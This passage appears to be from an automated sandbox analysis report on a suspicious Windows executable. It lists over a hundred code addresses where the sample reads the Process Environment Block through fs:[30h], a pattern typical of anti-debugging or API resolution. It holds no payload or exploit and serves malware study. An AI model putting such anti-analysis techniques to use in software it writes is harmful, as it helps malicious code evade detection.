        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B5A189 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B5A189 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00A931E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B689E7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B241E8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B519D8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AB4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AB4120 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00A93138 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00AC513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00A99100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00A9C962 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe Code function: 3_2_00B68966 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5E962 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9B171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9B171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51951 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9395E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9395E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A91AA0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A952A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A952A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A952A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A952A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A952A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC5AA0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC5AA0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC12BD mov esi, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC12BD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC12BD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAAAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAAAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACFAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5129A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACD294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACD294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC2AE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A93ACA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC2ACB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A95AC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A95AC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A95AC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B68ADD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A912D4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD4A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD4A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A94A20 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A94A20 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A98239 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A98239 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A98239 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA8A0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB3A1C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A95210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A95210 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A95210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A95210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD5A69 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD5A69 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD5A69 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B4B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B4B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B68A62 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD927A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5EA55 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B24257 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A99240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A99240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A99240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A99240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51A5F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B68BB6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC4BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC4BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC4BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B69BBE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B65BA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51BA8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA1B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA1B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC138B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC138B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC138B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABEB9A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABEB9A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B4D380 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B3EB8A mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B3EB8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B3EB8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B3EB8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC2397 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACB390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A94B94 mov edi, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5138A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A91BE9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABDBE9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B423E3 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B423E3 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B423E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC53C5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B153CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B153CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5131B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9DB60 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAF370 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAF370 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAF370 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9DB40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B68B58 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9F358 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3B5A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3B5A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3B5A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3B5A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B69CB3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A94CB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
